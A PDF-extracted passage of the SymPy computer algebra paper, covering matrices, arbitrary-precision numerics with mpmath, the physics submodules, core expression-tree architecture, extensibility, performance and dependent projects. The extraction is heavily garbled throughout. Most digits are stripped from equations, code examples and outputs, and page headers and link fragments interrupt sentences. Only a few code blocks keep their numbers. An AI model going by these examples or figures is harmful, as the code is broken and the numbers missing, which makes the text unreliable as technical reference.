/peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. similar to the polynomials submodule, dense here means that all entries are stored in memory, contrasted with a sparse representation where only nonzero entries are stored. both functions implicitly assume that expressions are equal to . for instance, solveset(x - , x) solves x− = for x. solveset is under active development as a planned replacement for solve. there are certain features which are implemented in solve that are not yet implemented in solveset, including multivariate systems, and some transcendental equations. some examples for solveset and solve can be found in section s . 
matrices besides being an important feature in its own right, computations on matrices with symbolic entries are important for many algorithms within sympy. the following code shows some basic usage of the matrix class. >>> a = matrix([[x, x + y], [y, x]]) >>> a matrix([ [x, x + y], [y, x]]) sympy matrices support common symbolic linear algebra manipulations, including matrix addition, multiplication, exponentiation, computing determinants, solving linear systems, singular values, and computing inverses using lu decomposition, ldl decomposition, gauss-jordan elimination, cholesky decomposition, moore–penrose pseudoinverse, or adjugate matrices. all operations are performed symbolically. for instance, eigenvalues are computed by generating the characteristic polynomial using the berkowitz algorithm and then finding its zeros using polynomial routines. >>> a.eigenvals() {x - sqrt(y*(x + y)): , x + sqrt(y*(x + y)): } internally these matrices store the elements as lists of lists (lil) (jones et al., ), meaning the matrix is stored as a list of lists of entries (effectively, the input format used to create the matrix a above), making it a dense representation. for storing sparse matrices, the sparsematrix class can be used. sparse matrices store their elements in dictionary of keys (dok) format, meaning that the entries are stored as a dict of (row, column) pairs mapping to the elements. sympyalsosupports matrices withsymbolicdimensionvalues. matrixsymbol represents a matrix with dimensions m×n, where m and n can be symbolic. matrix addition and multiplication, scalar operations, matrix inverse, and transpose are stored symbolically as matrix expressions. block matrices are also implemented in sympy. blockmatrix elements can be any matrix expression, including explicit matrices, matrix symbols, and other block matrices. all functionalities of matrix expressions are also present in blockmatrix . when symbolic matrices are combined with the assumptions submodule for logical inference, they provide powerful reasoning over invertibility, semi-definiteness, meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. orthogonality, etc., which are valuable in the construction of numerical linear algebra systems (rocklin, ). more examples for matrix and blockmatrix may be found in section s . numerics while sympy primarily focuses on symbolics, it is impossible to have a complete symbolic system without the ability to numerically evaluate expressions. many operations directly use numerical evaluation, such as plotting a function, or solving an equation numerically. beyond this, certain purely symbolic operations require numerical evaluation to effectively compute. for instance, determining the truth value of e+ >π is most conveniently done by numerically evaluating both sides of the inequality and checking which is larger. floating-point numbers floating-point numbers in sympy are implemented by the float class, which represents an arbitrary-precision binary floating-point number by storing its value and precision (in bits). this representation is distinct from the python built-in float type, which is a wrapper around machine double types and uses a fixed precision ( -bit). because python float literals are limited in precision, strings should be used to input precise decimal values: >>> float( . ) . >>> float( . , ) # precision equivalent to digits . >>> float(" . ", ) . 
the evalf method converts a constant symbolic expression to a float with the specified precision, here digits: >>> (pi + ).evalf( ) . float numbers do not track their accuracy, and should be used with caution within symbolic expressions since familiar dangers of floating-point arithmetic apply (goldberg, ). a notorious case is that of catastrophic cancellation: >>> cos(exp(- )).evalf( ) - applying the evalf method to the whole expression solves this problem. internally, evalf estimates the number of accurate bits of the floating-point approximation for each sub-expression, and adaptively increases the working precision until the estimated accuracy of the final result matches the sought number of decimal digits: >>> (cos(exp(- )) - ).evalf( ) - . e- meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. the evalf method works with complex numbers and supports more complicated expressions, such as special functions, infinite series, and integrals. the internal error tracking does not provide rigorous error bounds (in the sense of interval arithmetic) and cannot be used to accurately track uncertainty in measurement data; the sole purpose is to mitigate loss of accuracy that typically occurs when converting symbolic expressions to numerical values. the mpmath library the implementation of arbitrary-precision floating-point arithmetic is supplied by the mpmath library (johansson & the mpmath development team, ). originally, it was developed as a sympy submodule but has subsequently been moved to a standalone pure-python package. the basic datatypes in mpmath are mpf and mpc, which respectively act as multiprecision substitutes for python’s float and complex. the floating-point precision is controlled by a global context: >>> import mpmath >>> mpmath.mp.dps = # digits of precision >>> mpmath.mpf(" . ") + mpmath.exp(- ) mpf(' . ') >>> print(_) # pretty-printed . like sympy, mpmath is a pure python library. a design decision of sympy is to keep it and its required dependencies pure python. this is a primary advantage of mpmath over other multiple precision libraries such as gnu mpfr (fousse et al., ), which is faster. like sympy, mpmath is also bsd licensed (gnu mpfr is licensed under the gnu lesser general public license (rosen, )). internally, mpmath represents a floating-point number (− )sx · y by a tuple (s,x,y,b) where x and y are arbitrary-size python integers and the redundant integer b stores the bit length of x for quick access. if gmpy (horsen, ) is installed, mpmath automatically uses the gmpy.mpz type for x, and gmpy methods for rounding-related operations, improving performance. most mpmath and sympy functions use the same naming scheme, although this is not true in every case. for example, the symbolic sympy summation expression sum(f(x), (x, a, b)) representing ∑b x=a f (x) is represented in mpmath as nsum(f, (a, b)), where f is a numeric python function. the mpmath library supports special functions, root-finding, linear algebra, polynomial approximation, and numerical computation of limits, derivatives, integrals, infinite series, and solving odes. all features work in arbitrary precision and use algorithms that allow computing hundreds of digits rapidly (except in degenerate cases). the double exponential (tanh-sinh) quadrature is used for numerical integration by default. 
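the default tanh-sinh quadrature can be invoked directly through mpmath.quad. a minimal sketch at the default 15-digit working precision; the integral below equals sqrt(pi)/2:

>>> mpmath.mp.dps = 15
>>> print(mpmath.quad(lambda t: mpmath.exp(-t**2), [0, mpmath.inf]))
0.886226925452758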
for smooth integrands, this algorithm usually converges extremely rapidly, even when the integration interval is infinite or singularities are present at the endpoints (takahasi & mori, ; bailey, jeyabalan & li, ). however, for good performance, meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. singularities in the middle of the interval must be specified by the user. to evaluate slowly converging limits and infinite series, mpmath automatically tries richardson extrapolation and the shanks transformation (euler-maclaurin summation can also be used) (bender & orszag, ). a function to evaluate oscillatory integrals by means of convergence acceleration is also available. a wide array of higher mathematical functions is implemented with full support for complex values of all parameters and arguments, including complete and incomplete gamma functions, bessel functions, orthogonal polynomials, elliptic functions and integrals, zeta and polylogarithm functions, the generalized hypergeometric function, and the meijer g-function. the meijer g-function instance g , , ( ; ,− ,− ∣∣x) is a good test case (toth, ); past versions of both maple and mathematica produced incorrect numerical values for large x > . here, mpmath automatically removes an internal singularity and compensates for cancellations (amounting to bits of precision when x = , ), giving correct values: >>> mpmath.mp.dps = >>> mpmath.meijerg([[],[ ]], [[- . ,- ,- . ],[]], ) mpf(' . e- ') equivalently, with sympy’s interface this function can be evaluated as: >>> meijerg([[],[ ]], [[-s( )/ ,- ,-s( )/ ],[]], ).evalf() . e- symbolic integration and summation often produce hypergeometric and meijer g- function closed forms (see section ‘calculus’); numerical evaluation of such special functions is a useful complement to direct numerical integration and summation. physics submodule sympy includes several submodules that allow users to solve domain specific physics problems. for example, a comprehensive physics submodule is included that is useful for solving problems in mechanics, optics, and quantum mechanics along with support for manipulating physical quantities with units. classical mechanics one of the core domains that sympy suports is the physics of classical mechanics. this is in turn separated into two distinct components: vector algebra and mechanics. vector algebra the sympy.physics.vector submodule provides reference frame-, time-, and space- aware vector and dyadic objects that allow for three-dimensional operations such as addition, subtraction, scalar multiplication, inner and outer products, and cross products. the vector and dyadic objects both can be written in very compact notation that make it easy to express the vectors and dyadics in terms of multiple reference frames with arbitrarily defined relative orientations. the vectors are used to specify the positions, velocities, and accelerations of points; orientations, angular velocities, and angular accelerations of meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reference frames; and forces and torques. the dyadics are essentially reference frame-aware × tensors (tai, ). the vector and dyadic objects can be used for any one-, two-, or three-dimensional vector algebra, and they provide a strong framework for building physics and engineering tools. 
the following python code demonstrates how a vector is created using the orthogonal unit vectors of three reference frames that are oriented with respect to each other, and the result of expressing the vector in the a frame. the b frame is oriented with respect to the a frame using z-x-z euler angles of magnitude π, π , and π , respectively, whereas the c frame is oriented with respect to the b frame through a simple rotation about the b frame’s x unit vector through π . >>> from sympy.physics.vector import referenceframe >>> a, b, c = symbols('a b c', cls=referenceframe) >>> b.orient(a, 'body', (pi, pi/ , pi/ ), 'zxz') >>> c.orient(b, 'axis', (pi/ , b.x)) >>> v = *a.x + *b.z + *c.y >>> v a.x + *b.z + *c.y >>> v.express(a) a.x + *sqrt( )/ *a.y + / *a.z mechanics the sympy.physics.mechanics submodule utilizes the sympy.physics.vector submodule to populate time-aware particle and rigid-body objects to fully describe the kinematics and kinetics of a rigid multi-body system. these objects store all of the information needed to derive the ordinary differential or differential algebraic equations that govern the motion of the system, i.e., the equations of motion. these equations of motion abide by newton’s laws of motion and can handle arbitrary kinematic constraints or complex loads. the submodule offers two automated methods for formulating the equations of motion based on lagrangian dynamics (lagrange, ) and kane’s method (kane & levinson, ). lastly, there are automated linearization routines for constrained dynamical systems (peterson, gede & hubbard, ). quantum mechanics the sympy.physics.quantum submodule has extensive capabilities to solve problems in quantum mechanics, using python objects to represent the different mathematical objects relevant in quantum theory (sakurai & napolitano, ): states (bras and kets), operators (unitary, hermitian, etc.), and basis sets, as well as operations on these objects such as representations, tensor products, inner products, outer products, commutators, and anticommutators. the base objects are designed in the most general way possible to enable any particular quantum system to be implemented by subclassing the base operators and defining the relevant class methods to provide system-specific logic. symbolic quantum operators and states may be defined, and one can perform a full range of operations with them. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. >>> from sympy.physics.quantum import commutator, dagger, operator >>> from sympy.physics.quantum import ket, qapply >>> a, b, c, d = symbols('a b c d', cls=operator) >>> a = ket('a') >>> comm = commutator(a, b) >>> comm [a,b] >>> qapply(dagger(comm*a)).doit() -<a|*(dagger(a)*dagger(b) - dagger(b)*dagger(a)) commutators can be expanded using common commutator identities: >>> commutator(c+b, a*d).expand(commutator=true) -[a,b]*d - [a,c]*d + a*[b,d] + a*[c,d] on top of this set of base objects, a number of specific quantum systems have been implemented in a fully symbolic framework. these include: • many of the exactly solvable quantum systems, including simple harmonic oscillator states and raising/lowering operators, infinite square well states, and d position and momentum operators and states. • second quantized formalism of non-relativistic many-body quantum mechanics (fetter & walecka, ). • quantum angular momentum (zare, ). spin operators and their eigenstates can be represented in any basis and for any quantum numbers. 
a rotation operator representing the wigner d-matrix, which may be defined symbolically or numerically, is also implemented to rotate spin eigenstates. functionality for coupling and uncoupling of arbitrary spin eigenstates is provided, including symbolic representations of clebsch- gordon coefficients and wigner symbols. • quantum information and computing (nielsen & chuang, ). multidimensional qubit states, and a full set of one- and two-qubit gates are provided and can be represented symbolically or as matrices/vectors. with these building blocks, it is possible to implement a number of basic quantum algorithms including the quantum fourier transform, quantum error correction, quantum teleportation, grover’s algorithm, dense coding, etc. in addition, any quantum circuit may be plotted using the circuit_plot function (fig. ). here are a few short examples of the quantum information and computing capabilities in sympy.physics.quantum . start with a simple four-qubit state and flip the second qubit from the right using a pauli-x gate: >>> from sympy.physics.quantum.qubit import qubit >>> from sympy.physics.quantum.gate import xgate >>> q = qubit(' ') >>> q | > >>> x = xgate( ) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. h s t h s h figure the circuit diagram for a three-qubit quantum fourier transform generated by sympy. >>> qapply(x*q) | > qubit states can also be used in adjoint operations, tensor products, inner/outer products: >>> dagger(q) < | >>> ip = dagger(q)*q >>> ip < | > >>> ip.doit() quantum gates (unitary operators) can be applied to transform these states and then classical measurements can be performed on the results: >>> from sympy.physics.quantum.qubit import measure_all >>> from sympy.physics.quantum.gate import h, x, y, z >>> c = h( )*h( )*qubit(' ') >>> c h( )*h( )*| > >>> q = qapply(c) >>> measure_all(q) [(| >, / ), (| >, / ), (| >, / ), (| >, / )] lastly, the following example demonstrates creating a three-qubit quantum fourier transform, decomposing it into one- and two-qubit gates, and then generating a circuit plot for the sequence of gates (see fig. ). >>> from sympy.physics.quantum.qft import qft >>> from sympy.physics.quantum.circuitplot import circuit_plot >>> fourier = qft( , ).decompose() >>> fourier swap( , )*h( )*c(( ),s( ))*h( )*c(( ),t( ))*c(( ),s( ))*h( ) >>> c = circuit_plot(fourier, nqubits= ) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. some internal classes, such as those used in the polynomial submodule, do not follow this rule for efficiency reasons. architecture software architecture is of central importance in any large software project because it establishes predictable patterns of usage and development (shaw & garlan, ). this section describes the essential structural components of sympy, provides justifications for the design decisions that have been made, and gives example user-facing code as appropriate. the core a computer algebra system stores mathematical expressions as data structures. for example, the mathematical expression x+y is represented as a tree with three nodes, +, x, and y, where x and y are ordered children of +. as users manipulate mathematical expressions with traditional mathematical syntax, the cas manipulates the underlying data structures. symbolic computations such as integration, simplification, etc. are all functions that consume and produce expression trees. 
in sympy every symbolic expression is an instance of the class basic, the superclass of all sympy types providing common methods to all sympy tree-elements, such as traversals. the children of a node in the tree are held in the args attribute. a leaf node in the expression tree has empty args. for example, consider the expression xy+ : >>> x, y = symbols('x y') >>> expr = x*y + by order of operations, the parent of the expression tree for expr is an addition. it is of type add. the child nodes of expr are and x*y. >>> type(expr) <class 'sympy.core.add.add'> >>> expr.args ( , x*y) descending further down into the expression tree yields the full expression. for example, the next child node (given by expr.args[ ]) is . its class is integer, and it has an empty args tuple, indicating that it is a leaf node. >>> expr.args[ ] >>> type(expr.args[ ]) <class 'sympy.core.numbers.integer'> >>> expr.args[ ].args () symbols or symbolic constants, like e or π, are other examples of leaf nodes. >>> exp( ) e >>> exp( ).args meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the dotprint function from the sympy.printing.dot submodule prints output to dot format, which can be rendered with graphviz to visualize expression trees graphically. expr.func is used instead of type(expr) to allow the function of an expression to be distinct from its actual python class. in most cases the two are the same. () >>> x.args () a useful way to view an expression tree is using the srepr function, which returns a string representation of an expression as valid python code with all the nested class constructor calls to create the given expression. >>> srepr(expr) "add(mul(symbol('x'), symbol('y')), integer( ))" every sympy expression satisfies a key identity invariant: expr.func(*expr.args) == expr this means that expressions are rebuildable from their args. note that in sympy the == operator represents exact structural equality, not mathematical equality. this allows testing if any two expressions are equal to one another as expression trees. for example, even though (x+ ) and x + x+ are equal mathematically, sympy gives >>> (x + )** == x** + *x + false because they are different as expression trees (the former is a pow object and the latter is an add object). another important property of sympy expressions is that they are immutable. this simplifies the design of sympy, and enables expression interning. it also enables expressions to be hashed, which allows expressions to be used as keys in python dictionaries, and is used to implement caching in sympy. python allows classes to override mathematical operators. the python interpreter translates the above x*y + to, roughly, (x.__mul__(y)).__add__( ) . both x and y, returned from the symbols function, are symbol instances. the in the expression is processed by python as a literal, and is stored as python’s built in int type. when is passed to the __add__ method of symbol, it is converted to the sympy type integer( ) before being stored in the resulting expression tree. in this way, sympy expressions can be built in the natural way using python operators and numeric literals. extensibility while the core of sympy is relatively small, it has been extended to a wide variety of domains by a broad range of contributors. this is due, in part, to the fact that the same language, python, is used both for the internal implementation and the external usage by users. 
all of the extensibility capabilities available to users are also utilized by sympy itself. this eases the transition pathway from sympy user to sympy developer. the typical way to create a custom sympy object is to subclass an existing sympy class, usually basic, expr, or function. as was stated before, all sympy classes used for expression trees should be subclasses of the base class basic. expr is the basic subclass for mathematical objects that can be added and multiplied together. the most commonly seen classes in sympy are subclasses of expr, including add, mul, and symbol. instances of expr typically represent complex numbers, but may also include other "rings", like matrix expressions. not all sympy classes are subclasses of expr. for instance, logic expressions, such as And(x, y), are subclasses of basic but not of expr (see section s for more information on the sympy.logic submodule).
the function class is a subclass of expr which makes it easier to define mathematical functions called with arguments. this includes named functions like sin(x) and log(x) as well as undefined functions like f(x). subclasses of function should define a class method eval, which returns an evaluated value for the function application (usually an instance of some other class, e.g., a number), or none if for the given arguments it should not be automatically evaluated.
many sympy functions perform various evaluations down the expression tree. classes define their behavior in such functions by defining a relevant _eval_* method. for instance, an object can indicate to the diff function how to take the derivative of itself by defining the _eval_derivative(self, x) method, which may in turn call diff on its args. (subclasses of function should implement the fdiff method instead; it returns the derivative of the function without considering the chain rule.) the most common _eval_* methods relate to the assumptions: _eval_is_assumption is used to deduce assumption on the object.
listing presents an example of this extensibility. it gives a stripped down version of the gamma function Γ(x) from sympy. the methods defined allow it to evaluate itself on positive integer arguments, define the real assumption, allow it to be rewritten in terms of factorial (with gamma(x).rewrite(factorial)), and allow it to be differentiated. self.func is used throughout instead of referencing gamma explicitly so that potential subclasses of gamma can reuse the methods.
listing : a minimal implementation of sympy.gamma.

from sympy import Function, Integer, factorial, polygamma

class gamma(Function):
    @classmethod
    def eval(cls, arg):
        if isinstance(arg, Integer) and arg.is_positive:
            return factorial(arg - 1)

    def _eval_is_real(self):
        x = self.args[0]
        # noninteger means real and not integer
        if x.is_positive or x.is_noninteger:
            return True

    def _eval_rewrite_as_factorial(self, z):
        return factorial(z - 1)

    def fdiff(self, argindex=1):
        from sympy.core.function import ArgumentIndexError
        if argindex == 1:
            return self.func(self.args[0])*polygamma(0, self.args[0])
        else:
            raise ArgumentIndexError(self, argindex)

the gamma function implemented in sympy has many more capabilities than the above listing, such as evaluation at rational points and series expansion.
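assuming the listing above has been executed in a session where x is a symbol, a short hedged usage sketch of the custom class:

>>> gamma(5)
24
>>> gamma(x).rewrite(factorial)
factorial(x - 1)
>>> diff(gamma(x), x)
gamma(x)*polygamma(0, x)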
performance due to being written in pure python without the use of extension modules, sympy’s performance characteristics are generally poorer than that of its commercial competitors. for many applications, the performance of sympy, as measured by clock cycles, memory usage, and memory layout, is sufficient. however, the boundaries for when sympy’s pure python strategy becomes insufficient are when the user requires handling of very long expressions or many small expressions. where this boundray lies depends on the system at hand, but tends to be within the range of – symbols for modern computers. for this reason, a new project called symengine (the sympy developers, a) has been started. the aim of this poject is to develop a library with better performance characteristics for symbolic manipulation. symengine is a pure c++ library, which allows it fine-grained control over the memory layout of expressions. symengine has thin wrappers to other languages (python, ruby, julia, etc.). its aim is to be the fastest symbolic manipulation library. preliminary benchmarks suggest that symengine performs as well as its commercial and open source competitors. the development version of sympy has recently started to use symengine as an optional backend, initially in sympy.physics.mechanics only. future work will involve allowing more algorithms in sympy to use symengine as a backend. projects that depend on sympy there are several projects that depend on sympy as a library for implementing a part of their functionality. a selection of these projects are listed in table . conclusion and future work sympy is a robust computer algebra system that provides a wide spectrum of features both in traditional computer algebra and in a plethora of scientific disciplines. it can be used in a first-class way with other python projects, including the scientific python stack. sympy supports a wide array of mathematical facilities. these include functions for assuming and deducing common mathematical facts, simplifying expressions, performing common calculus operations, manipulating polynomials, pretty printing expressions, solving equations, and representing symbolic matrices. other supported facilities include discrete math, concrete math, plotting, geometry, statistics, sets, series, vectors, combinatorics, group theory, code generation, tensors, lie algebras, cryptography, and special functions. sympy has strong support for arbitrary precision numerics, backed by the mpmath package. additionally, sympy contains submodules targeting certain specific physics domains, such as classical mechanics and quantum mechanics. this breadth of domains has been engendered by a strong and vibrant user community. anecdotally, many of these users chose sympy because of its ease of access. sympy is a dependency of many external projects across a wide spectrum of domains. sympy expressions are immutable trees of python objects. unlike many other cas’s, sympy is designed to be used in an extensible way: both as an end-user application and as a library. sympy uses python both as the internal language and the user language. this meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected projects that depend on sympy. project name description sympy gamma an open source analog of wolfram |alpha that uses sympy (the sympy developers, b). there is more information about sympy gamma in section s . 
cadabra a cas designed specifically for the resolution of problems encountered in field theory (peeters, ). gnu octave symbolic package an implementation of a symbolic toolbox for octave using sympy (the symbolic package developers, ). sympy.jl a julia interface to sympy, provided using pycall (the sympy.jl developers, ). mathics a free, online cas featuring mathematica compatible syntax and functions (the mathics developers, ). mathpix an ios app that detects handwritten math as input and uses sympy gamma to evaluate the math input and generate the relevant steps to solve the problem (mathpix, inc., ). ikfast a robot kinematics compiler provided by openrave (diankov, ). sagemath a free open-source mathematics software system, which builds on top of many existing open-source packages, including sympy (the sage developers, ). pydy multibody dynamics with python (gede et al., ). galgebra a python package for geometric algebra (previously sympy.galgebra) (bromborsky, ). yt a python package for analyzing and visualizing volumetric data (turk et al., ). sfepy a python package for solving partial differential equations (pdes) in d, d, and d by the finite element (fe) method (zienkiewicz, taylor & zhu, ; cimrman, ). quameon quantum monte carlo in python (the quameon developers, ). lcapy an experimental python package for teaching linear circuit analysis (the lcapy developers, ). permits users to access the same methods used by the library itself in order to extend it for their needs. some of the planned future work for sympy includes work on improving code generation, improvements to the speed of sympy using symengine, improving the assumptions system, and improving the solvers submodule. additional information and declarations funding google summer of code provided financial support to students who contributed to sympy. ondřej Čertík was supported by the los alamos national laboratory. the los alamos national laboratory is operated by los alamos national security, llc, for the national nuclear security administration of the us department of energy under contract no. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sympygamma.com/ http://dx.doi.org/ . /peerj-cs. /supp- http://cadabra.science/index.html https://github.com/cbm /octsympy https://github.com/jverzani/sympy.jl https://mathics.github.io/ http://mathpix.com/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/ http://www.sagemath.org/ http://www.pydy.org/ https://github.com/brombo/galgebra http://yt-project.org/ http://sfepy.org/ http://quameon.sourceforge.net/ http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/ . /peerj-cs. de-ac - na . richard p. muller was supported by sandia national laboratories. sandia national laboratories is a multi-program laboratory managed and operated by sandia corporation, a wholly owned subsidiary of lockheed martin corporation, for the u.s. department of energy’s national nuclear security administration under contract de- ac - al . francesco bonazzi was supported by deutsche forschungsgemeinschaft (dfg) via the international research training group ‘‘self- assembled soft matter nano-structures at interfaces.’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: google summer of code. los alamos national laboratory: no. de-ac - na . sandia national laboratories: de-ac - al . 
international research training group . competing interests christopher p. smith is an employee of polar semiconductor, inc., bloomington, minnesota, united states; mateusz paprocki and matthew rocklin are employees of continuum analytics, inc., austin, texas, united states; andy r. terrel is an employee of fashion metric, inc, austin, texas, united states. author contributions • aaron meurer, christopher p. smith, mateusz paprocki, ondřej Čertík, sergey b. kirpichev, matthew rocklin, amit kumar, sergiu ivanov, jason k. moore, sartaj singh, thilina rathnayake, sean vig, brian e. granger, richard p. muller, francesco bonazzi, harsh gupta, shivam vats, fredrik johansson, fabian pedregosa, matthew j. curry, andy r. terrel, Štěpán roučka, ashutosh saboo, isuru fernando, sumith kulal, robert cimrman and anthony scopatz wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the source for the paper is at https://github.com/sympy/sympy-paper. the source code for sympy is at https://github.com/sympy/sympy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adams ww, loustaunau p. . an introduction to gröbner bases. vol. . boston: american mathematical society. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sympy/sympy-paper https://github.com/sympy/sympy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. bailey dh, jeyabalan k, li xs. . a comparison of three high-precision quadrature schemes. experimental mathematics ( ): – . bender cm, orszag sa. . advanced mathematical methods for scientists and engineers. st edition. berlin heidelberg: springer. biggs n, lloyd ek, wilson rj. . graph theory, – . oxford: oxford university press. bromborsky a. . geometric algebra/calculus modules for sympy galgebra. available at https://github.com/brombo/galgebra. bronstein m. a. pmint—the poor man’s integrator. available at http://www- sop.inria.fr/cafe/manuel.bronstein/pmint. bronstein m. b. symbolic integration i: transcendental functions. new york: springer–verlag. buchberger b. . ein algorithmus zum auffinden der basis elemente des restk- lassenrings nach einem nulldimensionalen polynomideal. phd thesis, university of innsbruck, innsbruck, austria. cervone d. . mathjax: a platform for mathematics on the web. notices of the ams ( ): – . cimrman r. . sfepy—write your own fe application. proceedings of the th european conference on python in science (euroscipy ). – . available at http://arxiv.org/abs/ . . ciurana e. . google app engine. in: developing with google app engine. firstpress (en ligne), berkeley: apress. diankov r. . ikfast: the robot kinematics compiler. available at http://openrave.org/ docs/latest_stable/openravepy/ikfast/ . doorenbos rb. . production matching for large learning systems. phd thesis, university of southern california. faugère jc. . a new efficient algorithm for computing gröbner bases (f ). journal of pure and applied algebra ( – ): – . faugère jc. . a new efficient algorithm for computing gröbner bases without reduction to zero (f ). in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm press – .. fetter a, walecka j. . quantum theory of many-particle systems. 
mineola: dover publications. fousse l, hanrot g, lefèvre v, pélissier p, zimmermann p. . mpfr: a multiple- precision binary floating-point library with correct rounding. acm transactions on mathematical software ( ): doi . / . . fu h, zhong x, zeng z. . automated and readable simplification of trigonomet- ric expressions. mathematical and computer modelling ( – ): – doi . /j.mcm. . . . gede g, peterson dl, nanjangud as, moore jk, hubbard m. . constrained multi- body dynamics with python: from symbolic equation generation to publication. in: asme international design engineering technical conferences and computers and meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/brombo/galgebra http://www-sop.inria.fr/cafe/manuel.bronstein/pmint http://www-sop.inria.fr/cafe/manuel.bronstein/pmint http://arxiv.org/abs/ . http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://dx.doi.org/ . / . http://dx.doi.org/ . /j.mcm. . . http://dx.doi.org/ . /peerj-cs. information in engineering conference, new york: american society of mechanical engineers, v bt a –v bt a . goldberg d. . what every computer scientist should know about floating-point arithmetic. acm computing surveys (csur) ( ): – . gosper rw. . decision procedure for indefinite hypergeometric summation. proceedings of the national academy of sciences of the united states of america ( ): – . gruntz d. . on computing limits in a symbolic manipulation system. phd thesis, swiss federal institute of technology, zürich, switzerland. horsen cv. . gmpy. available at https://pypi.python.org/pypi/gmpy . hudak p. . domain specific languages. in: salas ph, ed. handbook of programming languages, vol. iii: little languages and tools, chapter . indianapolis: macmillan, – . hunter jd. . matplotlib: a d graphics environment. computing in science & engineering ( ): – . johansson f, the mpmath development team. . mpmath: a python library for arbitrary-precision floating-point arithmetic. version . . available at http: //mpmath.org/ . jones e, oliphant t, peterson p, the scipy development team. . scipy: open source scientific tools for python. available at http://www.scipy.org/ (accessed on september ). kane tr, levinson da. . dynamics, theory and applications. new york: mcgraw hill. kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, the jupyter development team. . jupyter notebooks—a publishing format for reproducible computational workflows. in: positioning and power in academic publishing: players, agents and agendas: proceedings of the th international conference on electronic publishing. amsterdam: ios press, . lagrange j. . mécanique analytique. no. v. . paris: ve courcier. lang s. . introduction to transcendental numbers. in: addison-wesley series in mathematics. reading: addison-wesley pub. co. lutz m. . learning python. sebastopol: o’reilly media, inc. mathpix, inc. . mathpix — solve and graph math using pictures. available at http://mathpix.com/ . moses j. . algebraic simplification: a guide for the perplexed. in: symsac’ : proceedings of the second acm symposium on symbolic and algebraic computation. new york: acm press, – doi . / . . nielsen m, chuang i. . quantum computation and quantum information. new york: cambridge university press. nijenhuis a, wilf hs. . combinatorial algorithms: for computers and calculators. second edition. 
new york: academic press. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://pypi.python.org/pypi/gmpy http://mpmath.org/ http://mpmath.org/ http://www.scipy.org/ http://mathpix.com/ http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. oliphant te. . python for scientific computing. computing in science & engineering ( ): – . paprocki m. . design and implementation issues of a computer algebra system in an interpreted, dynamically typed programming language. master’s thesis, university of technology of wrocław, poland. peeters k. . cadabra: a field-theory motivated symbolic computer algebra system. computer physics communications ( ): – . pérez f, granger be. . ipython: a system for interactive scientific computing. computing in science & engineering ( ): – . peterson dl, gede g, hubbard m. . symbolic linearization of equations of motion of constrained multibody systems. multibody system dynamics ( ): – doi . /s - - - . petkovšek m, wilf hs, zeilberger d. . a = b. wellesley: ak peters, ltd., +.available at http://www.math.rutgers.edu/~zeilberg/aeqb.pdf . raymond e. . the cathedral and the bazaar. knowledge, technology & policy ( ): – . roach k. . hypergeometric function representations. in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm press – .. roach k. . in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm, – doi . / . - - - . rocklin m. . mathematically informed linear algebra codes through term rewriting. phd thesis, university of chicago. rocklin m, terrel ar. . symbolic statistics with sympy. computing in science and engineering ( ): – doi . /mcse. . . rose kh. . xy-pic user’s guide. available at http://ctan.org/tex-archive/macros/ generic/diagrams/xypic/doc/xyguide.pdf . rosen l. . open source licensing: software freedom and intellectual property law. upper saddle river: prentice hall. sakurai j, napolitano j. . modern quantum mechanics. boston: addison-wesley. shaw m, garlan d. . software architecture: perspectives on an emerging discipline. pittsburgh: prentice hall. sussman gj, wisdom j. . functional differential geometry. cambridge: mas- sachusetts institute of technology press. tai c-t. . generalized vector and dyadic analysis: applied mathematics in field theory. vol. . hoboken: wiley-ieee press. takahasi h, mori m. . double exponential formulas for numerical integration. publications of the research institute for mathematical sciences ( ): – . the lcapy developers. . lcapy, a python package for linear circuit analysis. available at http://lcapy.elec.canterbury.ac.nz/ . meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://www.math.rutgers.edu/~zeilberg/aeqb.pdf http://dx.doi.org/ . / . - - - http://dx.doi.org/ . /mcse. . 